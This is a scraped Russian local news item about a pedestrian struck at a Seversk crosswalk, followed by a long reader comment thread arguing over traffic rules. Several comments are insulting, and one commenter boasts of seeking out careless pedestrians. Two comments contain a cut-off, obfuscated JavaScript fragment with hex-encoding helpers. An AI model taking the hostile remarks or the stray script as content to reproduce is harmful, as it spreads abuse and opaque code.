Последние комментарии:

26.03.2024 00:12 написал ponni
19.03.2024 20:31 написал ponni
16.03.2024 21:51 написал alex33kaw
14.03.2024 19:11 написал ponni
05.03.2024 23:34 написал tourson
01.03.2024 18:51 написал ponni
01.03.2024 18:49 написал ponni
26.02.2024 20:57 написал rudolf
26.02.2024 17:47 написал ponni
21.02.2024 20:59 написал ponni
17.02.2024 09:30 написал ponni
14.02.2024 09:37 написал sprinter
14.02.2024 09:35 написал sprinter
13.02.2024 21:00 написал барыга
13.02.2024 20:57 написал барыга


Водитель сбил девушку на «зебре»


Водитель сбил девушку на «зебре»

Сегодня в 08:35 около дома № 91 по проспекту Коммунистическому произошло ДТП. Водитель Toyota RAV4, двигаясь по проспекту Коммунистическому со стороны улицы Курчатова, совершил наезд на девушку-пешехода 1991 года рождения. Она переходила проезжую часть по нерегулируемому пешеходному переходу. Девушка с места ДТП была доставлена в приемный покой медучреждения. В настоящее время ее осматривают врачи.





Категория: Новости » Северск » Происшествия

Комментарии: (67) 

26 февраля 2016   3

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: sergus
Напротив белой аптеки, а не Коммунистический 91. Коммунистический 117-115 пешеходный переход. Вечно тут все путают.
 Аварий море сегодня в Северске и Томске.

Комментарий № 2:

Написал: Санёк Северский
там и 2 автобуса ещё столкнулись...

Комментарий № 3:

Написал: BVD
Молокососов Надо учить ездить на автомобиляхи не давать им заочно права.

Комментарий № 4:

Написал: sergus
Там 2 пешеходных перехода, вот дальний напротив ап реки вообще не нужен ни к чему, тем более по готам щас 250м меж переходами должно быть.

Комментарий № 5:

Написал: sergus
Тот дальний переход не нужен и он противоречит гостам минимум 250м должно быть между переходами, надо в администрацию написать там постоянно давят, убрать его и меньше аварий и наездов будет.

Комментарий № 6:

Написал: ToreDo
Я тоже чуть не сбил сегодна утром двух куриц, вообще не думают головой пешеходы, в наглую под колеса, будто целенаправленно. УЧИТЕ ПДД ПЕШЕХОДЫ!!! Или элементарно чувство самосохранения включайте.

Комментарий № 7:

Написал: Димбас
ТРЕБУЮ ОБРАТИТЬ ВНИМАНИЕ СОТРУДНИКОВ ДПС НА ПЕШЕХОДОВ И НАЧАТЬ ИХ ШТРАФОВАТЬ ПО ПОЛНОЙ КАК НАС ВОДИТЕЛЕЙ, ИДУТ В НАГЛУЮ НЕ ПОНИМАЯ ЧТО АВТО НЕ МОЖЕТ МГНОВЕННО ОСТАНОВИТЬСЯ ИЛИ ХОТЯТ ДЕНЖАТ ЗАРАБОТАТЬ НА СВОЕМ ЗДОРОВЬЕ!!!!!!!?????

Комментарий № 8:

Написал: гульнара
Да она сама ему под колеса пошла, такой гололед! Сейчас ни за что накажут((( А пешеходу урок - когда гололед убедись, что машина остановилась и тебя пропустили.
Этот пешеходный реально ни к чему, там идут без остановки и некоторые даже головы не поворачивают.  

Комментарий № 9:

Написал: Roman
Наоборот, переходы должны быть везде и желательно со светофором с кнопкой. 

Комментарий № 10:

Написал: 555666
Я просто в ахкуе, эти двуногие себя чувствуют бесмертными баранами, им правила накуй не нужны где написано дословно писать не буду, убедись что тебя пропускают потом иди,они су..а прут как будто правы, пилять у меня стоит регик и я спецом ищу таких даунов,и пусть потом доказывают что двуногий прав, есть правила для пешеходов и для водителей, даже если я или кто то из водителей будет виноват,но он будет жить а пешик -2,так что пусть думают башкой своей а не мозгами Дежкина который им как в секте вдолбил что пешик всегда прав.Нет такого  правилах.

Комментарий № 11:

Написал: bb
Цитата: гульнара
Этот пешеходный реально ни к чему, там идут без остановки и некоторые даже головы не поворачивают.  
 
Поддерживаю, этот пешеходник совершенно ни к чему, т.к. недалеко еще один переход (если не ошибаюсь, расстояние между переходами около 100 метров, если не меньше).
Цитата: 555666
даже если я или кто то из водителей будет виноват,но он будет жить а пешик -2

кстати тоже не понимаю таких людей. Главное "Я ПРАВ", а остальное - не важно. Только что толку от такой правоты, если правый оказывается в больнице с переломами или на кладбище? Тоже самое касается и водителей, что толку от правоты, когда твоя машина разбита? 

Комментарий № 12:

Написал: Ниньтенда
555666,
А каким дауном нужно быть, чтобы в нашем маленьком городе на изусть не запомнить где пешеходные переходы и соответственно выбирать скорость и учитывать погодные условия?

Комментарий № 13:

Написал: Asleif
Для таких умников как 555666, п.4.5 ПДД не дает права водителю не пропускать пешеходов. Водитель в принципе обязан снижать скорость при приближении к пешеходному переходу (особенно, если зона видимости ограничена)
Да, есть отмороженные пешеходы, которые вылетают из-за углов, кустов и т.п. не глядя на дорогу. И еще больше водителей, которые делают вид "я -звезда, меня все видят, я никого" и добавляют газку, чтоб быстрее проскочить переход пока пешеходы к краю проезжей части подходят. Или и так несутся с превышением скорости, соответсвенно остановиться своевременно не могут.
На переходах камеры надо устанавливать. 3 раза попался на нарушении- пошел экзамены сдавать на подтверждение права владения водительским удостоверением. Люди, работающие с техникой ежегодно проходят проверку знаний, а тут один раз получил бумажку и все ок.
 У нас на дорогах сначала ДДД действуют, а потом уже все остальное.

Комментарий № 14:

Написал: renault
Ниньтенда,
Так у нас-же пол города водителей от "БОГА" которым в гололёд лучше на автобусах двигаться,а они гоняют как в видио играх хотя только на права сдал раза с шестого.
Шёл не так давно с гаража,чухан маргает мол иди я остановлюсь,как тормозил так мимо меня и проехал....Так-что среди Водителей Очень много Водятелов wink

Комментарий № 15:

Написал: 555666
Ниньтенда,
Выучи русский язык как и что пишется,потом пиши, во вторых, я соблюдаю все и вся,но если они тупо идут как зомби тебе ни что не поможет ни твои знания где переходы и т.дAsleif,
том комментируй даун.

Комментарий № 16:

Написал: 555666
Asleif,
Ты сам понял что написал?И ты пунктами из правил не офишируй а для начала сам изучи их комментатор, и выучи что должен и обязан пешеход.

Комментарий № 17:

Написал: Hornet
Asleif,
Что ни строчка - то направление на пересдачу или в больничку, если пешеход. Учи ПДД, клоун.

Комментарий № 18:

Написал: michael
Золотое правило почтового: ДАВИ ПЕШИКОВ! МЫ ЖЕ ЦАРИ, КУПИМ КОРЫТО В КРЕДИТ И НЕГОЖЕ ЦАРЯМ ХОЛОПОВ ПРОПУСКАТЬ!

Комментарий № 19:

Написал: f1gv83
гололед, блин.. что одни, что другие летят высунув язык и по сторонам не смотрят..
мне сегодня чуть в корму не въехал, вот любят всякие латентные гомики прижиматься...

Цитата: michael
Золотое правило почтового: ДАВИ ПЕШИКОВ! МЫ ЖЕ ЦАРИ, КУПИМ КОРЫТО В КРЕДИТ И НЕГОЖЕ ЦАРЯМ ХОЛОПОВ ПРОПУСКАТЬ!

а как насчет тех, кто стоит и ждет пока их пропустят, автомобили встанут - а они начинаеют руками махать - мол, проезжай, я не буду переходить!

Комментарий № 20:

Написал: f1gv83
Цитата: гульнара
убедись, что машина остановилась и тебя пропустили.

было бы чем убеждаться...

Цитата: Roman
Наоборот, переходы должны быть везде и желательно со светофором с кнопкой.

обеими руками "за" пешеходные светофоры.
PS  я водитель :)

Комментарий № 21:

Написал: ren
Водитель если видит пешехода у проезжей части то должен притормозить а лучше остановиться (в этом случае по правилам и практике перевес всех правил у пешеходов), а если пешеход одной ногой на проезжей части то водитель должен точно отсановиться до пешеходной зоны (зебры), если он остановился на пешеходной или проехав её, то нарушил скростной режим (и пофигу что гололед в этом случае водитель должен был включить инстинкт самосохронения и сохронения жизни других, ехать на меньшей скорости чем в хорошую погоду). 

Комментарий № 22:

Написал: Лиса
ren,
да где вы все берете-то про эту чёртову ногу? lol 
Дайте ссылку официальную, а я вам пиво fellow  

Комментарий № 23:

Написал: Hornet
Цитата: ren
Водитель если видит пешехода у проезжей части то должен притормозить а лучше остановиться (в этом случае по правилам и практике перевес всех правил у пешеходов), а если пешеход одной ногой на проезжей части то водитель должен точно отсановиться до пешеходной зоны (зебры), если он остановился на пешеходной или проехав её, то нарушил скростной режим (и пофигу что гололед в этом случае водитель должен был включить инстинкт самосохронения и сохронения жизни других, ехать на меньшей скорости чем в хорошую погоду). 
 
Это с кладбища мумия пишет?
ГИБДД Северска! Начинайте уже проводить ликбез! Беда с нашими бессмертными. 

Комментарий № 24:

Написал: Toni
ren,
"водитель должен". А вы не предполагаете, что за рулем находится пьяный наркоман лишенный прав, да еще и на угнанной машине. Так вот он никому ничего не должен. А суд признает его еще и невменяемым, направит на лечение если он собъет кого.

Комментарий № 25:

Написал: гульнара
ха если на каждом пешеходном останавливаться, то до дома час ехать будешь или два

Комментарий № 26:

Написал: Sanyshka
гульнара,
Да, конечно ты же в Москве живешь!!! Не барышень это дело на каждом пешеходном переходе остнавливаться))) Наберут корыт, а потом расхлебывайся, и в каждом малолетка с сигарой)))))) am 

Комментарий № 27:

Написал: Sanyshka

Toni,
Это детям своим надо объяснять! Я своим всегда говорю: "Все водители пьяные, светофоры не работают...." А взрослому не объяснить, если инстинкт самосохранения отсутствует!

Комментарий № 28:

Написал: Недовольный
Цитата: ren
Водитель если видит пешехода у проезжей части то должен притормозить а лучше остановиться


Чё???... Ты вообще в своем уме??? Блин вот читю иногда про Северск и ахреневаю: вы что там совсем от собственной невъе...сти охренели? Блин у нас в Краснодаре пешеход даже ногу боится поставить на зебру, если машины едут. Я вообще не понимаю как в Северске, где везде 40 км\ч бьются и пешиков давят.
P.S. Специально для особо одаренных: водитель НЕ ОБЯЗАН при виде пешехода на тротуаре притормаживать - это его ЛИЧНАЯ инициатива.

Комментарий № 29:

Написал: Roman
Недовольный,
40 у нас ездят только ученики автошкол и очень отдельные граждане. Даже ДПС по Коммунистическому нарушают, без "люстры".

Комментарий № 30:

Написал: Санёк Северский
"Водитель сбил"-шёл пешком и сбил,"совершил наезд"-наехал конкретно-лепота...)

Комментарий № 31:

Написал: f1gv83
Цитата: ren
Водитель если видит пешехода у проезжей части то должен притормозить а лучше остановиться (в этом случае по правилам и практике перевес всех правил у пешеходов), а если пешеход одной ногой на проезжей части то водитель должен точно отсановиться до пешеходной зоны (зебры), если он остановился на пешеходной или проехав её, то нарушил скростной режим (и пофигу что гололед в этом случае водитель должен был включить инстинкт самосохронения и сохронения жизни других, ехать на меньшей скорости чем в хорошую погоду).

ну вот, пример недоработки еще со времен школы.
вместо сексвоспитания надо ПДД долбить с начальных классов.

Комментарий № 32:

Написал: f1gv83
Цитата: renault
Шёл не так давно с гаража,чухан маргает мол иди я остановлюсь,как тормозил так мимо меня и проехал....Так-что среди Водителей Очень много Водятелов wink

морзянкой сигнализировал?
 или может быть, "чухан" внимание к себе привлекал по причине того, что не мог остановиться?
подумай на досуге, может он тебе жизнь и здоровье спас... другой бы просто раскатал в блин и дело с концом.

Комментарий № 33:

Написал: 555666
Учите ПДД маклауды....4.5. На нерегулируемых пешеходных переходах пешеходы могут выходить на проезжую часть (трамвайные пути) после того, как оценят расстояние до приближающихся транспортных средств, их скорость и убедятся, что переход будет для них безопасен. При переходе дороги вне пешеходного перехода пешеходы, кроме того, не должны создавать помех для движения транспортных средств и выходить из-за стоящего транспортного средства или иного препятствия, ограничивающего обзорность, не убедившись в отсутствии приближающихся транспортных средств.

4.6. Выйдя на проезжую часть (трамвайные пути), пешеходы не должны задерживаться или останавливаться, если это не связано с обеспечением безопасности движения. Пешеходы, не успевшие закончить переход, должны остановиться на островке безопасности или на линии, разделяющей транспортные потоки противоположных направлений. Продолжать переход можно лишь убедившись в безопасности дальнейшего движения и с учетом сигнала светофора (регулировщика).

Комментарий № 34:

Написал: cyj,
а мне понравилось как два  гайца, с двумя товарищами в такой же  форме, объяснялись,такие дружные ребята )))))
 

Комментарий № 35:

Написал: uncleandrew
Цитата: 555666
Ниньтенда, Выучи русский язык как и что пишется,потом пиши, во вторых, я соблюдаю все и вся,но если они тупо идут как зомби тебе ни что не поможет ни твои знания где переходы и т.дAsleif, том комментируй даун.
 

Само-то русский я-я или йо-йо? 


--------------------
https://vk.com/autolawyerts

Комментарий № 36:

Написал: uncleandrew
Цитата: Asleif
Водитель в принципе обязан снижать скорость при приближении к пешеходному переходу (особенно, если зона видимости ограничена)
 

Где это написано? 


--------------------
https://vk.com/autolawyerts

Комментарий № 37:

Написал: 555666
uncleandrew,
я я натюрлих.
 

Комментарий № 38:

Написал: Kapitalin-nike
Цитата: renault
чухан маргает мол иди я остановлюсь,как тормозил так мимо меня и проехал...
А у тебя мысли не возникло, что он "маргал" для того, чтобы предупредить тебя, что не сможет затормозить, и чтобы ты не бросался под него? // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 39:

Написал: Ember
Как пешеход жив благодаря правилам вживленным еще при СССР - перед переходом дороги, остановиться, посмотреть налево и направо, убедиться в безопасности, только потом начинать движение. Причем вертеть головой продолжать до конца перехода. Особое внимание при выходе на вторую полосу, если на первой авто пропускает, особенно автобус. Перед автобусами я останавливаюсь и вытягивая глову смотрю не летит ли кто.

Комментарий № 40:

Написал: KUPA
Kapitalin-nike, обычно для предотвращения ДТП подают звуковой сигнал, а моргание дальним светом-это неформальное сигнализирование чего угодно:" привет"," проходи", "я тебя пропускаю" ," спасибо", "шухер-менты" и т.д. Моргать можно долго и упорно, и мыслей на этот счет может быть много, и у каждого они свои,  как  точно идентифицировать твои моргания???

Комментарий № 41:

Написал: Asleif
Hornet,
http://www.pdd24.com/pdd/pdd14
Учи матчасть.  П.14.1 специально для таких как ты и 555666

Комментарий № 42:

Написал: Asleif
Цитата: 555666
убедись что тебя пропускают потом иди,они су..а прут как будто правы
 
Значит попробуй не уступить пешику дорогу по зебре при гаишнике. Он тебе правила рублем разъяснит.

Комментарий № 43:

Написал: KUPA
Ember, всё верно делаете! Так же учу детей! 
Я водитель и я офигиваю от ситуации на дороге!
Пешеходные переходы не просматриваемые, дорога разбита+неадекватов на дороге всё больше и больше!
Кстати, пешеходы стали осторожней, в тёмное время замечаю всё больше людей на пешеходном переходе с фонариками, реально помогает!

Комментарий № 44:

Написал: Kapitalin-nike
Цитата: KUPA
Моргать можно долго и упорно, и мыслей на этот счет может быть много, и у каждого они свои,  как  точно идентифицировать твои моргания???
  Если жить хочется, и в голове присутствуют мозги, то ты под любую машину не попадёшь, что моргающую, что пищащую, что молчащую. А если нет мозга, то никакие сигналы не помогут!

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 45:

Написал: KUPA
uncleandrew,
14.1. Водитель транспортного средства, приближающегося к нерегулируемому пешеходному переходу, обязан уступить дорогу пешеходам, переходящим дорогу или вступившим на проезжую часть (трамвайные пути) для осуществления перехода


Комментарий № 46:

Написал: KUPA
Kapitalin-nike, так и я о том же, ты хоть заморгайся, но пока не остановилься-ты машина убийца!

Комментарий № 47:

Написал: KUPA
Недовольный,
 P.S. Специально для особо одаренных: водитель НЕ ОБЯЗАН при виде пешехода на тротуаре притормаживать - это его ЛИЧНАЯ инициатива.

14.1. Водитель транспортного средства, приближающегося к нерегулируемому пешеходному переходу, обязан уступить дорогу пешеходам, переходящим дорогу или вступившим на проезжую часть (трамвайные пути) для осуществления перехода


Видимо, дело в культуре!
В Москве, зебру неглядя переходят, т.к. уверены, что пропустят и пропускают!
Лично проверено, независимо от марки машины-останавливаются все! 

Комментарий № 48:

Написал: uncleandrew
Цитата: KUPA
14.1. Водитель транспортного средства, приближающегося к нерегулируемому пешеходному переходу, обязан уступить дорогу пешеходам, переходящим дорогу или вступившим на проезжую часть (трамвайные пути) для осуществления перехода
 

Спасибо, КЭП. И гэдэ тут про снизить скорость? И в особенности обязан? Глазки лупим, толк неймем? 


--------------------
https://vk.com/autolawyerts

Комментарий № 49:

Написал: uncleandrew
Цитата: Asleif
Значит попробуй не уступить пешику дорогу по зебре при гаишнике. Он тебе правила рублем разъяснит.
 

Разъяснить понятие "уступить" или ткнуть в тот же пдд24? 


--------------------
https://vk.com/autolawyerts

Комментарий № 50:

Написал: Hornet
Цитата: Asleif
Hornet, http://www.pdd24.com/pdd/pdd14 Учи матчасть.  П.14.1 специально для таких как ты и 555666
 
Так ты прочитай, чтотам пишут! Потом советуй. 

Комментарий № 51:

Написал: 555666
Цитата: Asleif
4.5. На нерегулируемых пешеходных переходах пешеходы могут выходить на проезжую часть (трамвайные пути) после того, как оценят расстояние до приближающихся транспортных средств, их скорость и убедятся, что переход будет для них безопасен. При переходе дороги вне пешеходного перехода пешеходы, кроме того, не должны создавать помех для движения транспортных средств и выходить из-за стоящего транспортного средства или иного препятствия, ограничивающего обзорность, не убедившись в отсутствии приближающихся транспортных средств. 4.6. Выйдя на проезжую часть (трамвайные пути), пешеходы не должны задерживаться или останавливаться, если это не связано с обеспечением безопасности движения. Пешеходы, не успевшие закончить переход, должны остановиться на островке безопасности или на линии, разделяющей транспортные потоки противоположных направлений. Продолжать переход можно лишь убедившись в безопасности дальнейшего движения и с учетом сигнала светофора (регулировщика).
 Вот ты и выучии умник, и запомни водитель если случится наезд на пешика сядет но выйдет, а пешик ляжет и не встанет,

Комментарий № 52:

Написал: гульнара
Да, конечно ты же в Москве живешь!!! Не барышень это дело на каждом пешеходном переходе остнавливаться))) Наберут корыт, а потом расхлебывайся, и в каждом малолетка с сигарой))))))


Александра Валентиновна, если ты курица, то и  останавливайся на каждом пешеходе и пропускай товарищей, которые не поворачивают голову в сторону дороги! Смотрю ты на лексусе ездишь!  А за малолетку спасибо, поржали))) 

Комментарий № 53:

Написал: ГУт

Никто, заметьте, не задался вопросом: О чём она думала, шагая прямо под колёса? А ведь об этом ещё Лев Николаевич Толстой писал в толстой книге "Анна Каренина".

Простим водителя?

Комментарий № 54:

Написал: Sanyshka
гульнара,
Так ты ник смени на Лошадь и ржи сколь душе угодно! Успокойся мамаша, раз не хочешь быть малолеткой)) Странно, откуда вывалились такие умные, если даже понятия не имеют о культуре поведения на дороге. Посмотришь, в больших городах и даже в Томске пешики бегают через дорогу где хотят и как хотят, водители останавливаются, пропускают!!! Что с дебилов взять. Но Северск же отдельное Королевство со своими уставами и правилами! Ты проедь сколько я поколесила по большим городам, тогда и разберёмся кто курица! Дальше Северска, судя по всему, носа не кажешь!!!
P.S. Отдельное спасибо за повышенное внимание к моей персоне! Коль обращаешься по имени и отчеству, так будь добра и на Вы))) 

Комментарий № 55:

Написал: Sanyshka
555666,
Все верно, безусловно! Но в нашем "Королевстве Северск" вон оно че происходит! Два дебила-это сила!!!

Комментарий № 56:

Написал: f1gv83
Sanyshka,
то есть дебилизм некоторых пешеходов надо принять как должное, неизбежное зло и ничего с этим не делать?

Комментарий № 57:

Написал: гульнара
Sanyshka, да расслабся, ты водила со стажем feel  и прикинь, что я тоже часто в больших городах езжу, но что то я там не встречала дибилов, которые под колеса бросаются. Я вот всегд и думаю, что за курица передо мной ездит и пропускает всех, кто бегает через дорогу... это ы оказывается - СУПЕР ВОДИЛА!!!

Комментарий № 58:

Написал: гульнара
Конечно я пропускаю иногда некоторых товарищей, типа тебя (в роли пешехода) просто потому, что не хочу срок получить из-за тупой башки!!!  

Комментарий № 59:

Написал: гульнара
Вот ты и выучии умник, и запомни водитель если случится наезд на пешика сядет но выйдет, а пешик ляжет и не встанет,

Золотые слова! 

Комментарий № 60:

Написал: гульнара
Я боюсь только детей на дорогах и мамаш, таскающих санки позади себя, а 25 летняя деваха сама уже должна боятся и не шагать по пешеходному, как по тратуару, голова нужно, чтобы ей вертеть!


https://www.youtube.com/watch?v=uFKp6jcvEHY

Комментарий № 61:

Написал: Hornet
Цитата: Sanyshka
Посмотришь, в больших городах и даже в Томске пешики бегают через дорогу где хотят и как хотят, водители останавливаются, пропускают!!! Что с дебилов взять
 
Это где в Томске такое? 

Комментарий № 62:

Написал: partretina
555666,
Согласен прям на 100%.  Под каждым словом бы подписался. Как будто не понимают, что водитель пропустить конечно должен, но жизнь то их. Да, водитель в случае наезда будет виновником ДТП. Но в больнице (в лучшем случае лежать пешику). Стали водил штрафовать - они стали пропускать чаще. Пешики просто оборзели и уже даже не останавливаются перед переходом. Многие даже головы не поворачивают. До увеличения штрафов такого не было. И мне кажется (статистики правда не знаю), что сбивать стали чаще. Господа пешеходы! Поберегите Ваше здоровье и жизни !!! Оттепели, гололед, Солнце светит в глаза (особенно утром и вечером). Успеете вы перейти дорогу - не такое уж у нас в городе движение интенсивное. Да и ГИБДД могло бы какую нибудь социальную рекламку на ТВ оформить специально для пешеходов.

Комментарий № 63:

Написал: PMn
гульнара,
То есть Вы пропускаете людей только потому что боитесь наказания (цитата:"
Конечно я пропускаю иногда некоторых товарищей, типа тебя (в роли пешехода) просто потому, что не хочу срок получить из-за тупой башки!!!  
"),  а не потому что для Вас было бы страшно травмировать или убить человека?  Ужасает такая позиция, особенно у женщины. Да согласна, на дорогах дебилов хватает - причем с двух сторон, и, естественно, каждый должен сам думать о собственной безопасности. Только отличие в том, что изначально водитель и пешеход находятся не в равных условиях, так как у водителя есть огоромное приемущество (и соответсвенно огоромная ответсвенность) в виде этой самой тяжелой машины. И, безусловно, пешеход это должен осозновать в первую очередь, так как речь идет о его жизни (и об этом человек должен помнить всегда), но ведь если водитель травмирует или, не дай Бог, убьет пешехода, ведь это навсегда останеться на нем (не зависимо кто был виноват в аварии). И если это понимать, то гораздо проще пропустить бегущего балбеса, чем потом жить с таким грузом на душе. Конечно, при условии, что эта душа есть и с ней все в порядке. Иногда почитаешь комментарии, и становиться не по себе, от системы ценностей людей.

Комментарий № 64:

Написал: гульнара
PMn, нет,   я пропускаю  пешеходов обязательно причем всегда  (особенно детей),  и машины другие,  и всегда уступаю! Я нормально вожу машину!
Вы не то читаете, я имею ввиду пешеходов, которые не поворачиввают голову в сторону дороги, из за балбесов страдают потом все - и сам пешеход и водитель!  Мне страшно и трамвировать и убить( но об этом должны думать все, и пешеход в том числе. Речь о том, что пешеход видела машину и видела, что она не может остановится, но всё равно шагнула под неё! 
Но когда пишут о том, что надо на всех пешеходных останавливаться...это бред! И культура должна быть у всех, а не только у водителей! 

Комментарий № 65:

Написал: partretina

Цитата: Hornet
Посмотришь, в больших городах и даже в Томске пешики бегают через дорогу где хотят и как хотят, водители останавливаются, пропускают!!! Что с дебилов взять Это где в Томске такое? 

 

В Томске гораздо более адекватные пешики. Тут девушка пишет, что по многим большим городам ездила. Я тоже много где ездил. И в Казахстане часто бываю. Там вообще еще в советское время было принято пешиков пропускать, а сейчас вообще не пропустить это , мне кажется, самое страшное нарушение. Но нет там явления массовых патенциальных самоубийц. Не могу сказать с чем это связано, но в Северске зачастую сложнее ездить чем в других, более крупных городах. А еще есть водители неадекватные, которые начинают пропускать пешеходов, которые еще только вышли из своего подъезда. Пешик еще и к переходу не подошел, и может он вообще переходить не собирается, а так, в носу хочет на обочине поковырять. А его уже пропускают. В жо...у то не боитесь, что догонят? Ввели бы законодательно что нибудь типа : пешеход, собравшийся переходить проезжую часть обязан остановиться на краю проезжей части и поднять руку вверх, обозначая намерение осуществить переход проезжей части. Переходить проезжую часть только убедившись, что его пропускают.  Для пешехода сложности никакой, зато дисциплинирует, а водители видят кто переходит, а кто просто отдохнуть остановился (а такие часто попадаются - руками машут чтобы проезжали)

Комментарий № 66:

Написал: 555666
Сегодня ехал по коммуне от белой аптеки в сторону универсама, так на переходе возле музея машины стоят и ждут,а пешики тупо идут один за другим, а рядом стоят гайцы и тупо стригут себе план, нет чтоб как то помогать и водителям и пешикам,у них одно на уме, побольше протоколов, а пешики идут в наглую видят гайцы стоят и покуй на водителей, а стоят и автобусы людей домой везут да ии все едут домой после17-00, я просто зае...ся ждать и смотреть на этот бырдак и поехал так как справа еще даже до бордюра пешик не дощол а слева только ступила на дорогу, гаишница сразу побежала меня останавливать но позно детка поезд ушол.Вот такая ситуация у нас в городе а вы говорите о вежливости, пешики если б собралось народу 2-3-4 чела идите а не друг за другом,думаю все имеют авто и когда сами едут начинают психовать,или я не прав? Если о мне так я даже близко к дороге не подхожу пока не будет свободно и только тогда перехожу,что б не тормозить водителей.

Комментарий № 67:

Написал: Hornet
555666,
Северские ГИБДДшники не для безопасности дорожного движения работают.
Они безопасность своей жопы блюдють очень тщательно.
Пешеходы - лишь способ прикрыть и сберечь это. 
stroimguru.ru
Курс валюты:
92.59 19↑   $     100.2 70↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: